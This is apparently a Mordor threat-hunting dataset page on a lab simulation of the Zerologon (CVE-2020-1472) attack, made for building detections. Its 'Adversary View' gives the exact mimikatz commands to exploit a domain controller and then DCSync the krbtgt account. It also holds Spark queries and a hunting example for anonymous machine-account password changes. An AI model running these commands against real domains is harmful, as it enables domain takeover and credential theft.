Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/16

Modification Date

2020/09/16

Tactics

['TA0008']

Techniques

['T1210']

Tags

['CVE-2020-1472', 'Password Update', 'Netlogon Insecure AES-CFB8']

Dataset Description

This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in the cryptographic authentication scheme used by the Netlogon Remote Protocol, which, among other things, can be used to update computer account passwords. This vulnerability was discovered by @SecuraBV.

Notebooks

Notebooks created by the community leveraging the mordor datasets

| Author | Name | Link |
|--------|------|------|

Simulation Plan

| Environment  | Tool Type | Module         |
|--------------|-----------|----------------|
| Mordor shire | C2        | ShellCmd       |
| Mordor shire | tool      | lsadump        |
| Mordor shire | tool      | SharpZeroLogon |

Adversary View

Mimikatz Implementation (NetrServerAuthenticate2)
=================================================

(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\" exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/


mimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit

Target : MORDORDC.theshire.local
Account: MORDORDC$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
====================================================

NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

mimikatz(commandline) # exit

Bye!

DCSync Follow-up (Optional)
===========================

(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\"\\" /authntlm\" exit"

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |102  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |99   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |88   |
|WORKSTATION6.theshire.local|Security                            |4658   |64   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |59   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |50   |
|WORKSTATION6.theshire.local|Security                            |4656   |32   |
|WORKSTATION6.theshire.local|Security                            |4690   |32   |
|WORKSTATION6.theshire.local|Security                            |4663   |32   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |25   |
|MORDORDC.theshire.local    |Security                            |5156   |21   |
|WORKSTATION5.theshire.local|Security                            |5158   |20   |
|MORDORDC.theshire.local    |Security                            |5158   |16   |
|WORKSTATION5.theshire.local|Security                            |5156   |16   |
|WORKSTATION6.theshire.local|Security                            |5156   |15   |
|WORKSTATION6.theshire.local|Security                            |5158   |15   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|3      |9    |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |7    |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11     |6    |
|WORKSTATION5.theshire.local|Security                            |4658   |6    |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows
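As an added hunting example (not part of the original dataset page or of the Mordor project): the computer account password reset that follows the successful NetrServerPasswordSet2 call shown in the adversary view is recorded on the DC as Security event 4742 ("A computer account was changed") whose subject is ANONYMOUS LOGON rather than the machine account itself. The field names assume Mordor's flattened Windows event schema, and the sample records are constructed.

```python
# Added hunting example, not part of the Mordor dataset page. After the
# unauthenticated NetrServerAuthenticate2 / NetrServerPasswordSet2 exchange,
# the DC logs the machine-account password change as Security 4742 with
# SubjectUserName = ANONYMOUS LOGON (S-1-5-7), since no session was ever
# authenticated. Field names and sample records below are assumptions.

# Equivalent SparkSQL for the mordorTable view registered above.
ZEROLOGON_4742_SQL = """
SELECT `@timestamp`, Hostname, SubjectUserName, TargetUserName, PasswordLastSet
FROM mordorTable
WHERE Channel = 'Security'
  AND EventID = 4742
  AND SubjectUserName = 'ANONYMOUS LOGON'
  AND TargetUserName LIKE '%$'
"""

def is_anonymous_machine_password_change(event: dict) -> bool:
    """True for a 4742 where an anonymous subject changed a machine account."""
    return (
        event.get("Channel") == "Security"
        and int(event.get("EventID", 0)) == 4742
        and str(event.get("SubjectUserName", "")).upper() == "ANONYMOUS LOGON"
        and str(event.get("TargetUserName", "")).endswith("$")
    )

def hunt_zerologon_password_reset(events):
    """Return (Hostname, TargetUserName) for every matching event, in order."""
    return [(e["Hostname"], e["TargetUserName"])
            for e in events if is_anonymous_machine_password_change(e)]

# Constructed sample records modelled on the dataset's hosts; not real data.
SAMPLE_EVENTS = [
    {"Hostname": "MORDORDC.theshire.local", "Channel": "Security", "EventID": 4742,
     "SubjectUserName": "ANONYMOUS LOGON", "SubjectUserSid": "S-1-5-7",
     "TargetUserName": "MORDORDC$", "PasswordLastSet": "9/16/2020 2:10:05 PM"},
    # Routine rotation: the computer changes its own password, so the subject
    # is the machine account and the record must not match.
    {"Hostname": "MORDORDC.theshire.local", "Channel": "Security", "EventID": 4742,
     "SubjectUserName": "WORKSTATION5$", "TargetUserName": "WORKSTATION5$"},
    # Anonymous network logon (4624) is a different event: not a match here.
    {"Hostname": "MORDORDC.theshire.local", "Channel": "Security", "EventID": 4624,
     "SubjectUserName": "-", "TargetUserName": "ANONYMOUS LOGON"},
    # Sysmon noise from a workstation.
    {"Hostname": "WORKSTATION5.theshire.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 7},
]

if __name__ == "__main__":
    print(hunt_zerologon_password_reset(SAMPLE_EVENTS))
```

Running the SQL string through `spark.sql(ZEROLOGON_4742_SQL).show(truncate=False)` applies the same filter to the registered dataset; a legitimate rotation appears with the computer account as its own subject, not ANONYMOUS LOGON.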